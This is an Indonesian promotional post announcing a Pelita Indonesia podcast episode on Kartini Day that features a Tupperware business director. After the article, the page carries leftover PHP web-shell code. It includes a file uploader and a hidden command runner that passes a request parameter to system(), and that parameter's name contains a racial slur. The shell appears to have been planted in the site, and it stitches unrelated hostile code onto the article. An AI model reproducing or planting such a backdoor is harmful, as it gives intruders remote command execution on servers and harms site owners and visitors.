#

Sambut Hari Kartini, Saksikan PINCAST Bertajuk “Kartini di Era Millennial”

Podcastnya Pelita Indonesia (PINCAST) kembali hadir untuk episode 9. Pada episode kali ini PINCAST mengangkat tema “Kartini di Era Millenial” untuk menyambut dan memperingati hari Kartini pada tanggal 21 April. Raden Adjeng Kartini adalah tokoh emansipasi wanita Indonesia. Buah perjuangan Ibu Kartini di masa lalu lah yang menyebabkan wanita saat ini dapat berkarir dengan bebas, bahkan sampai ke level tertinggi di sebuah lembaga, institusi, perusahaan, bahkan di sebuah negara. Sebagai bentuk penghormatan terhadap beliau, maka udah sepantasnya para wanita di era millennial ini memahami nilai-nilai yang beliau perjuangkan dulu.

Apa saja nilai-nilai tersebut? Apakah nilai-nilai tersebut masih relevan? dan bagaimana konsep Kartini di era milenial saat ini? Kalian semua bisa menemukan jawabannya dari obrolan seru Stefani Chandra, B.BusCom, MIB., selaku pemandu podcast dengan ibu Nurbeity Sitorus selaku narasumber. Ibu Nurbeity Sitorus merupakan Executive Director dari Business Center Tupperware Riau Cahaya Utami. Selain membahas seputar peringatan hari Kartini, ibu Nurbeity Sitorus juga akan menceritakan perjalanan karir beliau hingga mencapai level yang tertinggi, yang tentu nya hal ini terkait dengan kesetaraan hak antara wanita dengan pria.

Sudah bisa dipastikan bahwa obrolan ini akan sangat menarik dan dapat menginspirasi para wanita yang menonton nya. PINCAST eps. 9 ini akan tayang perdana pada hari Jumat (22/04/2022) pada jam 19.00 WIB. Jadi jangan ketinggalan untuk menonton nya di kanal YouTube Pelita Indonesia. Jangan sampai ketinggalan ya, atau kalian akan kehilangan kesempatan untuk mendapatkan giveaway untuk mendapatkan 5 hadiah menarik yang disponsori langsung oleh Tupperware.

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>